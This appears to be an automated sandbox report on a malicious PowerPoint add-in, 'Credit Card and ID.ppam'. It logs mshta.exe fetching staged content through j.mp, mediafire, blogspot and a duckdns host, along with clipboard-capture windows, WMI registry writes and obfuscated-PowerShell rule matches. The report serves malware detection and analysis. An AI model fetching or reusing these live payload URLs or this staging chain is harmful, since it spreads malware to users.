Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501276074.00000000056CF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/travel/?dest_src=al
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.google.de/contact/impressum.html
Source: mshta.exe, 00000010.00000003.484481957.00000000033D7000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Source: mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svg
Source: mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png)
Source: mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/search_black_24dp.png
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.mJX-uhXwTA4.O/rt=j/m=q_dnp
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.shRVBKchaBo.L.X.O/m=qawd
Source: mshta.exe, 00000005.00000002.441579663.0000000003A07000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.440369877.0000000003A07000.00000004.00000001.sdmp String found in binary or memory: https://www.mediafire.com/
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.440284850.000000000399C000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441515938.000000000399C000.00000004.00000001.sdmp String found in binary or memory: https://www.mediafire.com/file/o7mbmqzedgahqhw/30.doc/file
Source: mshta.exe, 00000010.00000002.498179973.000000000331E000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501276074.00000000056CF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ODOASODOccomplermxjdajse[1].htm Jump to behavior
Source: unknown DNS traffic detected: queries for: j.mp
Source: global traffic HTTP traffic detected: GET /ODOASODOccomplermxjdajse HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /file/o7mbmqzedgahqhw/30.doc/file HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: www.mediafire.com
Source: global traffic HTTP traffic detected: GET /k67dpqw5qwtg/o7mbmqzedgahqhw/30.doc HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Cookie: ukey=6xpb2tazciakllrv4ebq5j0751h13hdfConnection: Keep-AliveHost: download1370.mediafire.com
Source: global traffic HTTP traffic detected: GET /p/30.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kdaoskdokaodkwldld.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/1529571102-css_bundle_v2.css HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/403901366-ieretrofit.js HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=3903609419317699398&zx=5f07c876-ed15-412f-a301-ebcedf46395e HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/1397508952-widgets.js HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://kdaoskdokaodkwldld.blogspot.com/p/30.html&type=blog HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ServiceLogin?passive=true&continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26type%3Dblog%26bpli%3D1&go=true HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: accounts.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fkdaoskdokaodkwldld.blogspot.com%2Fp%2F30.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/body_gradient_tile_light.png HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/gradients_light.png HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s1/30.txt HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.starinxxxgkular.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1Accept: */*Referer: http://www.starinxxxgkular.duckdns.org/s1/30.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/errors/robot.png HTTP/1.1Accept: */*Referer: http://www.starinxxxgkular.duckdns.org/s1/30.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s1/30.txt HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.starinxxxgkular.duckdns.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 67.199.248.16:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 205.196.123.58:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.45:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49179 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\mshta.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\mshta.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Yara signature match
Source: 00000005.00000003.440508255.00000000002D7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.439129933.0000000003A3E000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.439823527.0000000003A41000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000002.441615888.0000000003A42000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.430608858.00000000002D2000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.440010639.00000000002D7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.439977474.00000000002D7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.438513361.0000000002EAC000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.440413446.0000000003A42000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.436677431.0000000002EA4000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.439894402.00000000002D7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.439936041.00000000002D7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000002.441611782.0000000003A3E000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.436681950.0000000002EAC000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.438685953.0000000002EA6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.440409722.0000000003A3F000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000002.440932261.00000000002D7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.430614086.00000000002D7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.430602975.00000000002DD000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Abnormal high CPU Usage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 98%
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: Credit Card and ID.ppam Virustotal: Detection: 23%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#...............................................`I.........v.....................K...................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#...............3..k......(..............._.............}..v......(.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../..................k....P.v..............._.............}..v......(.....0...............................$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../...............3..k......(..............._.............}..v......(.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;..................k....P.v..............._.............}..v....0.(.....0.......................b.......$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;...............3..k......(..............._.............}..v....h.(.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0._.............}..v....x.(.....0.................v.....".......$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G...............3..k....0.(..............._.............}..v......(.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S..................k....P.v..............._.............}..v....x.).....0...............................$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S...............3..k....0.)..............._.............}..v......).....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.M....._..................k....P.v..............._.............}..v....x.).....0...............................$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._...............3..k....0.)..............._.............}..v......).....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k..................k....P.v..............._.............}..v....x.).....0...............................$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k...............3..k....0.)..............._.............}..v......).....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w..................k....P.v..............._.............}..v....H.).....0...............................$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w...............3..k......)..............._.............}..v......).....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k....P.v..............._.............}..v....H#).....0...............................$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................3..k.....$)..............._.............}..v.....$).....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .E.x.c.e.p.t.i.o.n..........._.............}..v.....().....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................3..k.....()..............._.............}..v....P)).....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k....P.v..............._.............}..v......).....0.......................l.......$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................3..k....H/)..............._.............}..v...../).....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ ..........k....P.v..............._.............}..v....X3).....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................3..k.....4)..............._.............}..v.....4).....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k....P.v..............._.............}..v......7.....0...............................$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................3..k....h.7..............._.............}..v......7.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k....P.v..............._.............}..v......8.....0...............................$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................3..k....h.8..............._.............}..v......8.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k....P.v..............._.............}..v......8.....0.......................b.......$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................3..k......8..............._.............}..v....P.8.....0.................v.............$............... Jump to behavior
